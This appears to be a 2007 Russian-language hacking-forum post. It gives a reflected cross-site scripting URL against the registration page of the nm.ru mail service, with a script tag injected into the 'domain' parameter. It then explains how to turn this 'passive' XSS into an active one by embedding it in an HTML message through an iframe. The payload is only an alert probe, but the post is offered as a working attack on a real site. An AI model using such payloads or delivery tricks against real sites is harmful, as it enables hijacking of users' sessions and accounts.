27.07.2007, 00:04
|
|
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840
Репутация:
35
|
|
nm.ru
http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<scri pt>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=& answ=
это пассивная xss.
чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.
|
|
|